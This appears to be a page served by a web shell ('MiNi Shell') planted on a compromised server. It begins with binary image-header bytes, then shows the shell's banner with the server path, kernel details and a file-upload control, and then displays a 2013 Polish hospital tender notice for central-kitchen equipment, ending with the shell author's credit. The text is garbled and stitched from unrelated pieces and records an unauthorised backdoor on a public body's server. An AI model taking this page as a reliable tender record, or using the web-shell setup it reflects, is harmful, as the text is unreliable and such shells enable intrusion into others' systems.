JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130313/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130313/100438-N-2013.html

<p class="kh_header"><b>Poznań: Dostawa i montaż wyposażenia do Kuchni Centralnej Ginekologiczno-Położniczego Szpitala Klinicznego Uniwersytetu Medycznego im. K.Marcinkowskiego w Poznaniu</b><br>
<b>Numer ogłoszenia: 100438 - 2013; data zamieszczenia: 13.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ginekologiczno-Położniczy Szpital Kliniczny Uniwersytetu Medycznego im. Karola Marcinkowskiego w Poznaniu , ul. Polna 33, 60-535 Poznań, woj. wielkopolskie, tel. 061 8419294, faks 061 8419620.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż wyposażenia do Kuchni Centralnej Ginekologiczno-Położniczego Szpitala Klinicznego Uniwersytetu Medycznego im. K.Marcinkowskiego w Poznaniu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa i montaż  wyposażenia do Kuchni Centralnej Ginekologiczno-Położniczego Szpitala Klinicznego Uniwersytetu Medycznego
im. K. Marcinkowskiego w Poznaniu w podziale na części:
Część  Nr  1;  Dostawa i montaż wyposażenia - stoły, regały, szafy chłodnicze
Część  Nr  2;  Dostawa i montaż wyposażenia -  piec konwekcyjno-parowy, maszyna do mycia naczyń kuchennych,  miksery
Część  Nr  3;  Dostawa i montaż wyposażenia -  kotły, patelnie, taboret elektryczny
Część Nr  4;   Dostawa i montaż wyposażenia -  maszynka do mielenia mięsa, krajalnica do wędlin
Część  Nr  5;  Dostawa i montaż wyposażenia -  szatkownica do warzyw, obieraczka do ziemniaków, waga magazynowa.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.31.20.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia  wadium w  kwocie: 4 550.00 zł  (słownie: cztery tysiące pięćset pięćdziesiąt złotych) dla całości zamówienia. Wadium dla poszczególnych części wynosi:
	-  część nr 1  -   1 700.00 zł, słownie:  jeden tysiąc siedemset złotych
	-  część nr 2  -   1 500.00 zł, słownie: jeden tysiąc pięćset złotych
	-  część nr 3  -   1 100.00 zł, słownie: jeden tysiąc sto złotych
	-  część nr 4  -      110.00 zł, słownie: sto dziesięć złotych
	-  część nr 5  -      140.00 zł, słownie: sto czterdzieści złotych
Wadium  wnosi  się  przed  upływem   terminu  składania  ofert.


Wadium  może  być  wniesione  w  jednej  lub  kilku  następujących  formach;
a)	pieniądzu;
b)	poręczeniach  bankowych  lub  poręczeniach  spółdzielczej  kasy  oszczędnościowo - kredytowej,  z  tym  że  poręczenie  kasy  jest  zawsze  poręczeniem  pieniężnym,
c)	gwarancjach  bankowych;
d)	gwarancjach  ubezpieczeniowych;
e)	poręczeniach  udzielanych  przez  podmioty, o  których  mowa w  art.  6 b  ust. 5  pkt. 2 ustawy  z  dnia  9  listopada  2000 r.  o  utworzeniu  Polskiej  Agencji  Rozwoju Przedsiębiorczości  ( Dz. U.  z  2007 r.  Nr  42,  poz. 275 ).
Z treści gwarancji / poręczenia winno wynikać bezwarunkowe, na każde  pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach  określonych w art. 46  ust. 4a oraz ust. 5  ustawy.
Miejsce  i  sposób  wniesienia  wadium
Wadium  wnoszone  w  pieniądzu  Wykonawca  wpłaca  przelewem  na  rachunek Zamawiającego:  SGB  SA I/O Poznań 08161011332003000275150001 lub CITI HANDLOWY SA  07103012470000000087905012.
W  przypadku  wnoszenia  wadium  w  pozostałych  formach należy  je  złożyć  w  oryginale  w  kasie  Zamawiającego  (pokój  nr  319  w  Budynku  wejście  D 1,  III piętro).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek w sytuacji, kiedy wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia  działalności  jest  krótszy - w  tym  okresie, wykonał lub wykonuje dwie dostawy odpowiadające przedmiotowi zamówienia i wartości każdej z nich  nie  mniejszej  niż;
-  70 000  zł brutto  dla  części  nr  1
-  62 000  zł  brutto dla  części  nr  2
-  49 000  zł  brutto dla  części  nr  3
-  4 100  zł  brutto dla  części  nr  4
-  5 200  zł  brutto  dla  części  nr  5</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego, Zamawiający  wymaga  przedstawienia  wraz  z  ofertą:
opisów oferowanych  wyrobów  w  języku  polskim i fotografii  potwierdzających  wymagane  parametry  dla  przedmiotu  zmówienia  wraz z  przyporządkowaniem  do części i pozycji zamówienia.  
Na żądanie Zamawiającego  Wykonawca poświadcza autentyczność dostarczonych  opisów i fotografii.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca  może  polegać  na  wiedzy i doświadczeniu  innych  podmiotów niezależnie  od  charakteru  prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji  zobowiązany  jest  udowodnić Zamawiającemu,  iż  będzie  dysponował  zasobami  niezbędnymi  do  realizacji  zamówienia,  w  szczególności  przedstawiając  w  tym  celu  pisemne  zobowiązanie  tych  podmiotów  do  oddania  mu  do  dyspozycji  niezbędnych   zasobów  na  okres  korzystania  z  nich  przy  wykonaniu  zamówienia.
W  celu  oceny  spełniania  przez  Wykonawcę  warunków,  o  których  mowa  w  art.  22  ust.  1  ustawy z dnia 29 stycznia 2004r. - Prawo zamówień publicznych, Zamawiający żąda następujących dokumentów :

1.1	oświadczenia  o  spełnianiu  warunków  udziału  w  postępowaniu  -  załącznik  nr  3 do  specyfikacji.

1.2	wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych głównych dostaw, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a  jeżeli  okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy  zostały wykonane - załącznik nr  5 do specyfikacji

1.3	dowodów  potwierdzających  należyte  wykonanie lub wykonywanie dostaw:
1.3.1	poświadczenie, z tym że w odniesieniu do nadal wykonywanych dostaw okresowych lub ciągłych poświadczenie powinno  być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert  lub

1.3.2	oświadczenie Wykonawcy jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca  nie jest w stanie uzyskać poświadczenia , o którym mowa  w pkt. 1.3.1  lub

1.3.3	referencje

W przypadku gdy Zamawiający jest podmiotem, na rzecz  którego dostawy wskazane w wykazie, o którym mowa w pkt. 1.2, zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów o których mowa w pkt. 1.3.

Jeżeli  wykaz lub dowody, o których mowa w pkt. 1.2  i  pkt. 1.3 budzą wątpliwości Zamawiającego lub gdy z poświadczenia albo z innego dokumentu wynika, że zamówienie nie zostało wykonane lub zostało wykonane nienależycie, Zamawiający może zwrócić się bezpośrednio do właściwego podmiotu, na rzecz którego dostawy były lub miały zostać wykonane, o przedłożenie dodatkowych informacji lub dokumentów bezpośrednio Zamawiającemu.

       1.4.	Wykonawca powołujący się przy wykazywaniu spełnienia warunku udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia przedkłada pisemne zobowiązanie tych  podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.


2.	W  celu  wykazania  braku  podstaw  do  wykluczenia  z  postępowania  o  udzielenie  zamówienia  Wykonawcy  w  okolicznościach,  o  których  mowa  w  art.  24  ust. 1   ustawy  Zamawiający  żąda  następujących  dokumentów;
	2.1	oświadczenia  o   braku  podstaw  do  wykluczenia ;  załącznik  nr  4 specyfikacji.  
        2.2	aktualnego  odpisu  z  właściwego  rejestru  lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli  odrębne  przepisy  wymagają  wpisu  do  rejestru  lub ewidencji,  w  celu  wykazania  braku  podstaw  do  wykluczenia  w  oparciu  o  art.  24  ust.1  pkt. 2  ustawy,  wystawionego  nie  wcześniej  niż  6  miesięcy  przed  upływem  terminu  składania  ofert
	Ponadto Zamawiający  pod  rygorem wykluczenia z postępowania  wymaga na podstawie art. 26 ust. 2d ustawy przedstawienia  listy podmiotów należących do tej samej grupy kapitałowej, albo informacji o tym że Wykonawca nie należy do grupy kapitałowej.
	Wykonawcy powołujący się przy wykazywaniu spełnienia  warunku udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia przedkłada dokumenty dotyczące tego podmiotu w zakresie  wymaganym od  Wykonawcy, określonym w rozdziale  VI  pkt. 2 ppkt.  2.1,   i  2.2.

Wykonawca mający siedzibę  lub  miejsce zamieszkania  poza  terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, wskazanych w  rozdziale VI pkt. 2  ppkt. 2.2  składa dokument  lub  dokumenty wystawione w kraju,  w  którym  ma  siedzibę  lub   miejsce zamieszkania, potwierdzające  odpowiednio,  że:
a)	nie otwarto jego likwidacji ani  nie  ogłoszono   upadłości - wystawione  nie  wcześniej  niż  6  miesięcy  przed  upływem terminu  składania  ofert

W  przypadku wątpliwości co do treści dokumentu złożonego przez  Wykonawcę  mającego  siedzibę lub miejsce zamieszkania poza  terytorium Rzeczypospolitej Polskiej, Zamawiający może zwrócić się do właściwych organów odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania z wnioskiem, o udzielenie niezbędnych informacji dotyczących przedłożonego dokumentu.


Wymagania formalne dotyczące składanych  oświadczeń i dokumentów;

Dokumenty i oświadczenia wymagane dla  potwierdzenia spełniania przez Wykonawców warunków udziału w postępowaniu
	należy złożyć w oryginale lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę, z wyjątkiem oświadczenia wymienionego  w pkt.  1.1  i  1.4  specyfikacji, które musi zostać złożone w formie oryginału.

W przypadku Wykonawców wspólnie ubiegających  się o  udzielenie zamówienia oraz w przypadku podmiotów, o których  mowa  w  §  1  ust.  6,  §  3  ust. 4,  §  7 ust.2   Rozporządzenia  Prezesa  Rady  Ministrów  z  dnia  19 lutego 2013r.  w  sprawie rodzajów  dokumentów,  jakich  może  żądać Zamawiający  od  Wykonawcy  oraz  form,  w  jakich  te  dokumenty  mogą  być  składane, kopie  dokumentów  dotyczących  odpowiednio  Wykonawcy  lub  tych podmiotów  są  poświadczane  za zgodność 
z oryginałem przez Wykonawcę  lub  te  podmioty. 

Zamawiający zażąda przedstawienia oryginału lub notarialnie  poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona kopia dokumentu  jest nieczytelna lub będzie budziła wątpliwości co do jej prawdziwości.

Dokumenty  sporządzone  w  języku  obcym  są  składane  wraz  z  tłumaczeniem  na  język  polski.

W przypadku  składania jednej oferty przez  dwa  lub więcej podmiotów ( Wykonawców ubiegających się  wspólnie o  udzielenie  zamówienia  np. konsorcja ) oferta spełniać  musi  następujące wymagania:
w odniesieniu do wymagań postawionych przez Zamawiającego, każdy z  Wykonawców występujących wspólnie, oddzielnie musi udokumentować, że nie podlega  wykluczeniu na podstawie  art.  24  ust. 1 ustawy. Warunek posiadania wiedzy i doświadczenia spełnia co najmniej jeden z nich w wymaganym zakresie.
oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie
Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o  udzielenie  zamówienia  albo  reprezentowania  w  postępowaniu  i  zawarcia  umowy  w  sprawie zamówienia publicznego (do oferty dołączyć odpowiednie pełnomocnictwo). 
wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z podmiotem występującym jako pełnomocnik pozostałych. Wykonawcy wspólnie ubiegający się  o zamówienie, których oferta zostanie uznana za  najkorzystniejszą, przed podpisaniem umowy o realizację zamówienia, są zobowiązani  przedstawić Zamawiającemu umowę  regulującą współpracę tych podmiotów zawierającą następujące postanowienia:
a)	określenie celu  gospodarczego,
b)	określenie, który z podmiotów jest upoważniony do występowania w imieniu pozostałych przy realizacji zamówienia,
c)	oznaczenie czasu trwania obejmującego okres realizacji przedmiotu zamówienia,
d) 	zakaz zmian w umowie bez zgody Zamawiającego.
Nie dopuszcza się składania umowy przedwstępnej lub umowy zawartej pod warunkiem zawieszającym.

Złożenie wymaganych dokumentów po upływie terminu składania ofert jest możliwe jedynie w trybie  art.  26  ust. 3  ustawy - Prawo  zamówień publicznych. W sytuacji,  kiedy  Wykonawca  nie  złoży wymaganych przez Zamawiającego oświadczeń lub dokumentów, o których  mowa  w  art.  25  ust. 1  ustawy  i art. 26 ust. 2b i ust. 2d  lub  nie  złoży pełnomocnictwa  albo złoży wymagane przez Zamawiającego oświadczenia i dokumenty, o których mowa  w  art.  25  ust. 1  i art. 26 ust. 2d i ust. 2d  ustawy, zawierające błędy lub złoży wadliwe pełnomocnictwo, Zamawiający wezwie do ich złożenia w wyznaczonym terminie (za wyjątkiem sytuacji, kiedy mimo ich złożenia oferta Wykonawcy podlegałaby odrzuceniu lub konieczne  byłoby unieważnienie postępowania).
Złożone na wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu, nie później niż w dniu, w którym upłynął termin składania ofert.

Zawartość  oferty  i  sposób  jej  przedstawienia
1.	Ofertę stanowi wypełniony formularz   Oferta,  załącznik  nr  2   do  specyfikacji oraz niżej wymienione dokumenty:
a)    formularz specyfikacji cenowej, opis przedmiotu zamówienia; załącznik nr  1  do specyfikacji		
2.	Wraz z ofertą  należy złożyć:
a)	Oświadczenia i dokumenty  wskazane   w  rozdziale VI  specyfikacji,
b)	Pełnomocnictwo do podpisania oferty (oryginał lub kopia potwierdzona za zgodność z oryginałem przez notariusza) względnie do podpisania innych dokumentów składanych wraz z ofertą, o ile prawo do ich podpisania nie wynika z innych dokumentów złożonych wraz z ofertą.
c)	Pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia, ewentualnie umowa o współdziałaniu, z której wynikać będzie przedmiotowe pełnomocnictwo (oryginał lub kopia potwierdzona za zgodność z oryginałem przez notariusza). Pełnomocnik  może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy.
3.	Oferta  wraz  z  załącznikami  musi  być  podpisana  przez  osobę  upoważnioną  do  reprezentowania  Wykonawcy, zgodnie 
z formą reprezentacji Wykonawcy określoną w rejestrze lub innym dokumencie, właściwym dla danej formy organizacyjnej Wykonawcy albo przez upełnomocnionego przedstawiciela Wykonawcy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Z  uwzględnieniem  zapisu  art.  144  ust. 1  ustawy  Zamawiający  przewiduje  możliwość  dokonania  istotnych  zmian  postanowień  zawartej  umowy  w  stosunku  do  treści  oferty,  na  podstawie  której  dokonano  wyboru Wykonawcy  oraz  określa  warunki  tych  zmian  poprzez  wprowadzenie  do  zawartej  umowy  następujących  aneksów;
a.	aneks   w  zakresie  wymiany / uzupełnienia  elementów  składowych  sprzętu  w  sytuacji  gdy  wprowadzony  zostanie  do  sprzedaży  przez  Wykonawcę  produkt  zmodyfikowany / udoskonalony  oraz  w  przypadku  zaistnienia  konieczności  wymiany/uzupełnienia  elementów  składowych   sprzętu  w  związku  z  postępem  technologicznym
b.	aneks dopuszczający zmianę umówionego terminu wykonania zamówienia z powodu okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach
c.	aneks dopuszczający zmianę umówionego terminu wykonania zamówienia z powodu działań osób trzecich uniemożliwiających wykonanie dostaw, a które to działania nie są konsekwencją winy którejkolwiek ze stron.
W  celu  dokonania  zmian  zapisów  umowy  wnioskowanych  przez  Stronę,  zobowiązana  jest  ona  pisemnie  wystąpić  z  propozycją  zmiany  warunków  umowy  wraz z  ich  uzasadnieniem,  z  co najmniej dwutygodniowym wyprzedzeniem.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gpsk.am.poznan.pl/dzp<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego w Poznaniu, przy ul. Polnej 33, budynek wejście E1,  I piętro, pokój nr 104.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.03.2013 godzina 11:00, miejsce: Siedziba Zamawiającego w Poznaniu, przy  ul. Polnej  33 , pokój  nr  317 - Kancelaria  Ogólna  mieszcząca  się  w  Budynku  Wielofunkcyjnym  Szpitala, wejście  D1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com